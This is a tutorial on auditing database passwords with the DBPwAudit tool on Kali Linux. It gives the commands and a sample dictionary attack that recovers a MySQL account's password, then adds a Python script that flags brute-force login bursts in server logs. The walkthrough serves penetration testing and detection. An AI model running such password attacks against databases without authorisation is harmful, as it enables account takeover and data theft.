Database Auditing with Open Source Tool DBPwAudit

DBPwAudit is a Java-based tool designed to audit passwords for Oracle, MySQL, MS-SQL, and IBM DB2 servers. Its design is deliberately simple, so support for more database technologies can be added as required. It helps the pentester discover valid user accounts on a database management system that has not been hardened with a secure password policy. It currently supports the dictionary-based password attack mechanism.

To start DBPwAudit, navigate to Kali Linux | Vulnerability Analysis | Database Assessment | dbpwaudit or execute the following commands in your shell:

# cd /usr/share/dbpwaudit/
# dbpwaudit

This will display all the options and usage instructions on your screen. In order to know which database drivers are supported by DBPwAudit, execute the following command:

# dbpwaudit -L

This will list all the available database drivers, each specific to a particular database management system. Note their aliases, because the alias is how you refer to a driver when running a test. For the example that follows, we first have to install the MySQL driver. Once the MySQL database driver is in place, we can start auditing the target database server for common user accounts. For this exercise, we have also created two files, users.txt and passwords.txt, with a list of common usernames and passwords:

# dbpwaudit -s 10.2.251.24 -d pokeronline -D MySQL -U users.txt -P passwords.txt
DBPwAudit v0.8 by Patrik Karlsson <[email protected]>
----------------------------------------------------
[Tue Sep 14 17:55:41 UTC 2013] Starting password audit ...
[Tue Sep 14 17:55:41 UTC 2013] Testing user: root, pass: admin123
[Tue Sep 14 17:55:41 UTC 2013] Testing user: pokertab, pass: admin123
ERROR: message: Access denied for user 'root'@'10.2.206.18' (using password: YES), code: 1045
[Tue Sep 14 17:55:50 UTC 2013] Testing user: root, pass: RolVer123
ERROR: message: Access denied for user 'pokertab'@'10.2.206.18' (using password: YES), code: 1045
[Tue Sep 14 17:55:56 UTC 2013] Testing user: pokertab, pass: RolVer123 ...
[Tue Sep 14 17:56:51 UTC 2013] Finnishing password audit ...
Results for password scan against 10.2.251.24 using provider MySQL
------------------------------------------------------
user: pokertab pass: RolVer123
Tested 12 passwords in 69.823 seconds (0.17186314tries/sec)

Hence, we successfully discovered a valid user account. In the command above, the -d command-line switch specifies the target database name, -D specifies the database driver alias relevant to the target DBMS, -U specifies the usernames list, and -P specifies the passwords list.
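
Seen from the database side, the run above produces a burst of MySQL error 1045 "Access denied" messages from one client address. The following Python code is an added example, not part of the original article or of DBPwAudit: it flags hosts that exceed a failure threshold inside a sliding time window. The log line layout, the sample lines, and the thresholds are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The message text matches the error 1045 lines in the DBPwAudit output above.
# The timestamp and "[Note]" prefix are an assumed log layout.
LINE = re.compile(
    r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\S*\s.*"
    r"Access denied for user '([^']*)'@'([^']*)'"
)

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
2013-09-14T09:12:03Z 7 [Note] Access denied for user 'backup'@'10.2.206.40' (using password: YES)
2013-09-14T17:55:41Z 11 [Note] Access denied for user 'root'@'10.2.206.18' (using password: YES)
2013-09-14T17:55:41Z 12 [Note] Access denied for user 'pokertab'@'10.2.206.18' (using password: YES)
2013-09-14T17:55:50Z 13 [Note] Access denied for user 'root'@'10.2.206.18' (using password: YES)
2013-09-14T17:55:52Z 0 [Note] Event Scheduler: Loaded 0 events
2013-09-14T17:56:02Z 15 [Note] Access denied for user 'root'@'10.2.206.18' (using password: YES)
2013-09-14T17:56:10Z 16 [Note] Access denied for user 'pokertab'@'10.2.206.18' (using password: YES)
2013-09-14T18:30:10Z 21 [Note] Access denied for user 'backup'@'10.2.206.40' (using password: YES)
"""


def detect_bruteforce(lines, max_failures=3, window=timedelta(seconds=60)):
    """Return {host: [usernames]} for hosts exceeding max_failures denied
    logins inside one sliding time window (thresholds are hypothetical)."""
    recent = defaultdict(deque)   # host -> (timestamp, user) failures in window
    flagged = defaultdict(set)    # host -> usernames tried while over threshold
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue              # not a failed-login record
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
        user, host = m.group(2), m.group(3)
        q = recent[host]
        q.append((ts, user))
        while ts - q[0][0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) > max_failures:
            flagged[host].update(u for _, u in q)
    return {host: sorted(users) for host, users in flagged.items()}


if __name__ == "__main__":
    for host, users in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: repeated failed logins for {', '.join(users)}")
```

The host with two isolated failures hours apart stays below the threshold, while the host cycling through several accounts within seconds is reported.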